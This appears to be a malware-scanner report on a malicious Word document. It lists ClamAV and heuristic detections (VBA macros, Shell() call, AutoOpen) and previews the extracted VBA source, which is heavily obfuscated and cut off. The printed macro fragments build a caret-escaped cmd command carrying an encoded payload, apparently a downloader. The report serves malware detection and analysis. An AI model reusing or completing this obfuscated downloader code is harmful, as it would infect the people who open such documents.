MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Sagent-6668012-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6668012-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9978 bytes |
SHA-256: f7604157a4e2d677e0db1b3118e9e1102a4629dc3306d7180183832a611ec871 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lvCCIXbtbWa" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KwGZnBwZBOBzin" Function koLuEC() On _ Error _ Resume _ Next Hour 97092 / wvWKH / 2820 / WGmKju Hour vbktS * uzisH DzlNzTVhwTM = "md" + " /" + "V^:" + "^O/C" + Chr(4 + 5 + 0 + 2 + 23) + "^s" + "^e^t " + "n" + "^1^fV=" + "^" + "=^=A" + "^A^gA" + "A" + "IA^AC" Hour jlWZUw * mOiuZA Hour 79565 / IpkbpJ Hour obbJqS * dKhYd Hour sjcKp / lfrAX LohZbri = "^Ag" + "^A^" + "A^IA^" + "AC^A^g^" + "AA^I^A" + "^AC" Hour daHMrw / NqvMw / FbzAL * XtNTp Hour ihBwz * 27522 Hour WvZvz / nQDmzF / 74452 * 78600 sHNiDuF = "A^gAA" + "^IA" + "^" + "A" + "CA^g" + "A^" + "A" + "^I" Hour 95159 * 50397 * 11807 / trcEC Hour 48516 / aYGRjP / cwPcGD * oqbvQG Hour 80953 / TwTIwk lbtozt = "^AACA" + "g^A^A" + "IA" + "^0^H^A^" + "9Bw^e" + "A^gG^Aj" + "BA^dA^" + "E" + "G^Aj" + "BQf^A^" Hour 31556 / wArqXP * 47348 / ApEpWB Hour MSCNpQ * iSUpB Hour 3834 * ZmRFJ SwYusjQVwO = "s^D" + "^" + "Ar^BQ^Y" + "^" + "A" + "^U^G^A" + "^y^Bg^" Hour 95897 / oQOTaN * 76446 / 47708 Hour 72407 / iGiYs / 69593 / pzlhZl RVVqGniCN = "YA^s^" + "DAJB" + "^g^b" + "^AoG^" + "A^kAA" + "^I^" + "A" Hour 91359 * MbSPj Hour NHHSrR / FWVzC / UsjVC / nzNJGG Hour afctwD * nKwaHH * 25171 * RmLaEU hjusZijVf = "0" + "GAl^B^" + "A^d" + "^A^kE" + "^A^t" + "^" + "AQ^ZA" + "s" + "G^AvBg" + "^dA" Hour 15990 * YzucE Hour 72639 * lrWrsE NUwmZIS = "^4GA" + "J" + "^Bw^O^A" + "kCA^" + "J" + "B" + "^gbA^oG" koLuEC = DzlNzTVhwTM + LohZbri + sHNiDuF + lbtozt + SwYusjQVwO + RVVqGniCN + hjusZijVf + NUwmZIS Hour 69676 / ZwEJW / 96043 / TwGkWQ Hour 86713 * CjTEFG Hour 60254 / PnpZrA Hour 7317 / zwBLzW End Function Function rBJYTJmYi() On _ Error _ Resume _ Next Hour KIYms * cpTDKT Hour UrnkUq / HYqbDQ Hour 17219 * 68000 LLzVcX = "^A^" + "k^A^A^I" + "^A^wC^A" + "^1B^w" + "^Y^A^" Hour 63219 * XZlTp / iLhRrI / MAQYP Hour lJLcP / kzjDsC Hour 9852 / nZEwG * 36328 * BZsXD ECCCclorcFM = "UE^" + "Ak^A^" + "A^K" + "AU" + "^G" + "^As^BQ" + "^a^AY^" + "E^Ak^" + "BQYA8" + "GA^s^B^" Hour 1354 * 15567 / 95197 * OQqtB aWYQvHqsK = "g^b" + "A" + "cH^AvBA" + "RA^4C^" + "AEBw" + "dA" + "YF^A" + "^kA" + "^" + "w^" + "eAk" Hour TrCSmk / WHwiLX * NlfnUm / 22898 Hour 18059 / bdEYw * KaNtpi / hdnfl JzQwl = "HAy^" + "B^A^" + "d" + "AsHA^p^" + "Ag" + "RA^w^" + "EAE" + "^BA^" + "JA^" + "AC^A^" + "u^B^" + "Q^aA" + "^AC" Hour mkjDFN * lRmEi * rJfLYV / 75850 zHVQjAknJz = "A^1" + "^Bw^Y^" + "A^" + "U^" + "EA^k^A^" + "A^K^Ag" + "G^A" + "^" + "j^BQ^Y" + "A^U^" + "G^AyBw" Hour sibzJj * aEGlp Hour 47526 / sXwov / 12699 / wWqUIT fZwEHlZ = "^bAYG^" + "A^7A^" + "w^" + "JA^U^" + "G^A4B^" + "Q^ZA^4" Hour 22744 / mlBOI * 86105 * mumUUo Hour ZnGnU * PDFJMz / 53343 / BPGpj Hour OCXHmF / pYnOQ CqbcpafUbm = "C^AnA" + "^wK^A8^" + "E^A" + "0B^" + "g^bA^QC" + "^" Hour JhZSA * DETqz Hour 57296 * 62095 / YKljji / IOjWw Hour 69696 * AdVoRp / 96062 / QcVRkT Hour 5661 * wCkin BHjuXDi = "Ar^" + "A^w" + "^JA^wF^" + "An" + "AwK" + "^A" + "MGA" + "^p^" + "B^A^b^A" + "I^G^A" + "^1^B" + "AcAo" + "^D^A2B" Hour 81020 * cAjSj / fLrUS / sVuwu Hour 79254 * 29095 * afVGK / opcJM Hour 18655 / pkaQV jiZSsiAYjl = "gbAUGA^" + "kA" + "^Q^P" + "^A" + "k^EAuBg" + "^a" Hour 20650 * tDftT Hour 5813 / OToKH FYvMifij = "^AQCA7" + "A" + "^w" + "J" + "^A^gD" + "AyA" + "^Q^MAc" Hour 50773 / 85620 Hour JRRrzk / TqiWT / 47686 / QiwAZN zwXrC = "CA^gAQ" + "^PAA" + "C" + "A^PB" + "A^" + "d" + "A4^G" + "AkA^wO" rBJYTJmYi = LLzVcX + ECCCclorcFM + aWYQvHqsK + JzQwl + zHVQjAknJz + fZwEHlZ + CqbcpafUbm + BHjuXDi + jiZSsiAYjl + FYvMifij + zwXrC Hour 37040 / RhGoq Hour 20705 * BiOlSZ Hour 2961 * UAlbM * IuVMWs * PfqUY End Function Function dhICu() On _ Error _ Resume _ Next Hour wCTimV / mGUvN / ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.